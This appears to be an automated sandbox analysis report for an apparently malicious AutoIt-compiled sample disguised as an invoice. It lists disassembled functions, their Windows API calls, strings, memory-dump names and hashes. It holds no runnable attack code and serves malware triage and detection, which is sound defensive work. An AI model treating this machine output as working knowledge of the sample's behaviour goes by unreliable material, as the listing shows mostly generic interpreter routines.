                                                              Function 0025D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 0025D5AE
                                                              • SetTextColor.GDI32(?,?), ref: 0025D5B2
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0025D5C8
                                                              • GetSysColor.USER32(0000000F), ref: 0025D5D3
                                                              • CreateSolidBrush.GDI32(?), ref: 0025D5D8
                                                              • GetSysColor.USER32(00000011), ref: 0025D5F0
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0025D5FE
                                                              • SelectObject.GDI32(?,00000000), ref: 0025D60F
                                                              • SetBkColor.GDI32(?,00000000), ref: 0025D618
                                                              • SelectObject.GDI32(?,?), ref: 0025D625
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0025D644
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0025D65B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0025D670
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0025D698
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0025D6BF
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0025D6DD
                                                              • DrawFocusRect.USER32(?,?), ref: 0025D6E8
                                                              • GetSysColor.USER32(00000011), ref: 0025D6F6
                                                              • SetTextColor.GDI32(?,00000000), ref: 0025D6FE
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0025D712
                                                              • SelectObject.GDI32(?,0025D2A5), ref: 0025D729
                                                              • DeleteObject.GDI32(?), ref: 0025D734
                                                              • SelectObject.GDI32(?,?), ref: 0025D73A
                                                              • DeleteObject.GDI32(?), ref: 0025D73F
                                                              • SetTextColor.GDI32(?,?), ref: 0025D745
                                                              • SetBkColor.GDI32(?,?), ref: 0025D74F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: 7b80fef931559acbde3302df17d635f51b1940cda50f3dff55abcc758e78d750
                                                              • Instruction ID: 81834605a0ab7bd6a39528aa2e26aeb23870792b13ec3afb06d930f2bd9a2a10
                                                              • Opcode Fuzzy Hash: 7b80fef931559acbde3302df17d635f51b1940cda50f3dff55abcc758e78d750
                                                              • Instruction Fuzzy Hash: 54514E71900209BFDF10AFA8EC48EAEBB79FF48325F504515F919AB2A1D7759A80CF50
                                                              Function 0025B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0025B7B0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0025B7C1
                                                              • CharNextW.USER32(0000014E), ref: 0025B7F0
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0025B831
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0025B847
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0025B858
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0025B875
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0025B8C7
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0025B8DD
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0025B90E
                                                              • _memset.LIBCMT ref: 0025B933
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0025B97C
                                                              • _memset.LIBCMT ref: 0025B9DB
                                                              • SendMessageW.USER32 ref: 0025BA05
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0025BA5D
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0025BB0A
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0025BB2C
                                                              • GetMenuItemInfoW.USER32(?), ref: 0025BB76
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0025BBA3
                                                              • DrawMenuBar.USER32(?), ref: 0025BBB2
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0025BBDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: 546d08438b12d4b2b72ea926ad0d9e2c1274a8a657d493e9c3d9d90574d368df
                                                              • Instruction ID: fd694283fac441ff48531868fc606be951009d7aad7788685bc8a41918b2e601
                                                              • Opcode Fuzzy Hash: 546d08438b12d4b2b72ea926ad0d9e2c1274a8a657d493e9c3d9d90574d368df
                                                              • Instruction Fuzzy Hash: 40E1C071920209AFDF219F61DC88EEE7BB8FF05315F108156FD19AA190D7B08AA5CF64
                                                              Function 001F2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Foreground
                                                              • String ID: ACTIVE$ALL$CLASS$H+*$HANDLE$INSTANCE$L+*$LAST$P+*$REGEXPCLASS$REGEXPTITLE$T+*$TITLE
                                                              • API String ID: 62970417-972381662
                                                              • Opcode ID: 8a08a7c6b36ad6f66798ed4e8268c7e50508cd88aa8bfd64743e3b24d4234117
                                                              • Instruction ID: 8df087b0a2371c88795cc9f0c8dfb92bbdca3873b15b1357650606df20edb22f
                                                              • Opcode Fuzzy Hash: 8a08a7c6b36ad6f66798ed4e8268c7e50508cd88aa8bfd64743e3b24d4234117
                                                              • Instruction Fuzzy Hash: E4D1B330128646DBCB04EF10C881AAABBB4BF64344F104A5DF556575A2DB70E9FECF91
                                                              Function 0025764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 0025778A
                                                              • GetDesktopWindow.USER32 ref: 0025779F
                                                              • GetWindowRect.USER32(00000000), ref: 002577A6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00257808
                                                              • DestroyWindow.USER32(?), ref: 00257834
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0025785D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0025787B
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002578A1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 002578B6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002578C9
                                                              • IsWindowVisible.USER32(?), ref: 002578E9
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00257904
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00257918
                                                              • GetWindowRect.USER32(?,?), ref: 00257930
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00257956
                                                              • GetMonitorInfoW.USER32 ref: 00257970
                                                              • CopyRect.USER32(?,?), ref: 00257987
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 002579F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: a6fcada709005dfa96bcaf58c58c05c8080fe3f52f7f495cc9cd82609c40f194
                                                              • Instruction ID: eb293641d26a1b9a9f54c47147273576675841d8dae7c64cb7dc62f3e2b81df1
                                                              • Opcode Fuzzy Hash: a6fcada709005dfa96bcaf58c58c05c8080fe3f52f7f495cc9cd82609c40f194
                                                              • Instruction Fuzzy Hash: 16B1C070618301EFDB00DF64E848B6ABBE5FF88311F00891DF9899B291D770E818CB96
                                                              Function 00236CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00236CFB
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00236D21
                                                              • _wcscpy.LIBCMT ref: 00236D4F
                                                              • _wcscmp.LIBCMT ref: 00236D5A
                                                              • _wcscat.LIBCMT ref: 00236D70
                                                              • _wcsstr.LIBCMT ref: 00236D7B
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00236D97
                                                              • _wcscat.LIBCMT ref: 00236DE0
                                                              • _wcscat.LIBCMT ref: 00236DE7
                                                              • _wcsncpy.LIBCMT ref: 00236E12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 18444c465b2d53a69818004464f2ab54797ff6663318f6ee02951ea95c3dbc0b
                                                              • Instruction ID: c3e859bc57e995d92734066ff91cecca94b4dcd98b65fdc2073f3b103b7d55d5
                                                              • Opcode Fuzzy Hash: 18444c465b2d53a69818004464f2ab54797ff6663318f6ee02951ea95c3dbc0b
                                                              • Instruction Fuzzy Hash: EC41F671520205BBEB00AB64CD47EBF77BCEF51710F144016F901A61C2EFB49A759AA1
                                                              Function 0020A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020A939
                                                              • GetSystemMetrics.USER32(00000007), ref: 0020A941
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0020A96C
                                                              • GetSystemMetrics.USER32(00000008), ref: 0020A974
                                                              • GetSystemMetrics.USER32(00000004), ref: 0020A999
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0020A9B6
                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0020A9C6
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0020A9F9
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0020AA0D
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 0020AA2B
                                                              • GetStockObject.GDI32(00000011), ref: 0020AA47
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0020AA52
                                                                • Part of subcall function 0020B63C: GetCursorPos.USER32(000000FF), ref: 0020B64F
                                                                • Part of subcall function 0020B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0020B66C
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000001), ref: 0020B691
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000002), ref: 0020B69F
                                                              • SetTimer.USER32(00000000,00000000,00000028,0020AB87), ref: 0020AA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: c1709b8e90bedb2117f23ce9a2d122d6b11837198ae6f8131b5e36ec3e2ec241
                                                              • Instruction ID: 82f5a1aabfe32de2cf46d4149030fede79e535207cb518b6a31bc692c6ce3eea
                                                              • Opcode Fuzzy Hash: c1709b8e90bedb2117f23ce9a2d122d6b11837198ae6f8131b5e36ec3e2ec241
                                                              • Instruction Fuzzy Hash: D7B16D71A2030A9FDB14DFA8DC49BAD7BB8FF08314F514219FA15A62D0D774A8A0CF51
                                                              Function 00253639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00253735
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0028DC00,00000000,?,00000000,?,?), ref: 002537A3
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002537EB
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00253874
                                                              • RegCloseKey.ADVAPI32(?), ref: 00253B94
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00253BA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 4a66c6dbeb1332e3ec491a95cb03661c38032794255e28b853b12c307447ebbe
                                                              • Instruction ID: 29d9fa4661ccc9097af7c745a6fd4ee6daa2f1731fcf08db094f369be19cc1b0
                                                              • Opcode Fuzzy Hash: 4a66c6dbeb1332e3ec491a95cb03661c38032794255e28b853b12c307447ebbe
                                                              • Instruction Fuzzy Hash: 970266B52106019FCB14EF24C895E2AB7E5FF98720F04855DF98A9B3A2CB30ED55CB85
                                                              Function 00256BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00256C56
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00256D16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 3974292440-719923060
                                                              • Opcode ID: 4f2531fa50c39ca5aca7cad3e681e47bd17662bad24259ee03a15bdefc1107f4
                                                              • Instruction ID: dbba58c7db11bbabfb605d130dace95af3ca074f80c7527492ade290506031b8
                                                              • Opcode Fuzzy Hash: 4f2531fa50c39ca5aca7cad3e681e47bd17662bad24259ee03a15bdefc1107f4
                                                              • Instruction Fuzzy Hash: D3A19C302243469BCB14EF20C856A7AB3A6BF94311F50496EBC565B3D2DB71EC29CB85
                                                              Function 0022CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0022CF91
                                                              • __swprintf.LIBCMT ref: 0022D032
                                                              • _wcscmp.LIBCMT ref: 0022D045
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0022D09A
                                                              • _wcscmp.LIBCMT ref: 0022D0D6
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0022D10D
                                                              • GetDlgCtrlID.USER32(?), ref: 0022D15F
                                                              • GetWindowRect.USER32(?,?), ref: 0022D195
                                                              • GetParent.USER32(?), ref: 0022D1B3
                                                              • ScreenToClient.USER32(00000000), ref: 0022D1BA
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0022D234
                                                              • _wcscmp.LIBCMT ref: 0022D248
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0022D26E
                                                              • _wcscmp.LIBCMT ref: 0022D282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                              • String ID: %s%u
                                                              • API String ID: 3119225716-679674701
                                                              • Opcode ID: aae758cb4b88adf9779163f811dea49bf9a7ffbf2e7cedf5121f235474676b58
                                                              • Instruction ID: 1199de432af56e535089986614733d62b36ddc6c72b6da1faf2b6aed005ab2e0
                                                              • Opcode Fuzzy Hash: aae758cb4b88adf9779163f811dea49bf9a7ffbf2e7cedf5121f235474676b58
                                                              • Instruction Fuzzy Hash: A8A1D071224313FBD714DFA0E884BAAB7A8FF44304F104619FE99D2191DB30EA65CB91
                                                              Function 0022D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0022D8EB
                                                              • _wcscmp.LIBCMT ref: 0022D8FC
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0022D924
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0022D941
                                                              • _wcscmp.LIBCMT ref: 0022D95F
                                                              • _wcsstr.LIBCMT ref: 0022D970
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0022D9A8
                                                              • _wcscmp.LIBCMT ref: 0022D9B8
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0022D9DF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0022DA28
                                                              • _wcscmp.LIBCMT ref: 0022DA38
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0022DA60
                                                              • GetWindowRect.USER32(00000004,?), ref: 0022DAC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: 724cf01d64615afb20a23e973aa9750933008c10cc3a4c04e66ee842305d912b
                                                              • Instruction ID: 932396381493c0a1e6e9033fd59965a6394131aa1ee67dca4de0187f7c6eefe4
                                                              • Opcode Fuzzy Hash: 724cf01d64615afb20a23e973aa9750933008c10cc3a4c04e66ee842305d912b
                                                              • Instruction Fuzzy Hash: FA810A31018316AFDB00DF90E985FAA7BE8FF54314F044469FD899A096DB30DDA5CBA1
                                                              Function 0022D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: b09327f57eb69674624716df1adf175f1544b35243e2c4ba421a8dedab81a0ea
                                                              • Instruction ID: 7bc4158cfe44da1a913980c9846a506b48f0c020605f71cf8530fa096295d2ee
                                                              • Opcode Fuzzy Hash: b09327f57eb69674624716df1adf175f1544b35243e2c4ba421a8dedab81a0ea
                                                              • Instruction Fuzzy Hash: FA31BE31664209F7DB14EA94ED43FFDB3A59F32314F600129F501710D1EFA1AE698A62
                                                              Function 0022EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 0022EAB0
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0022EAC2
                                                              • SetWindowTextW.USER32(?,?), ref: 0022EAD9
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0022EAEE
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0022EAF4
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0022EB04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0022EB0A
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0022EB2B
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0022EB45
                                                              • GetWindowRect.USER32(?,?), ref: 0022EB4E
                                                              • SetWindowTextW.USER32(?,?), ref: 0022EBB9
                                                              • GetDesktopWindow.USER32 ref: 0022EBBF
                                                              • GetWindowRect.USER32(00000000), ref: 0022EBC6
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0022EC12
                                                              • GetClientRect.USER32(?,?), ref: 0022EC1F
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0022EC44
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0022EC6F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
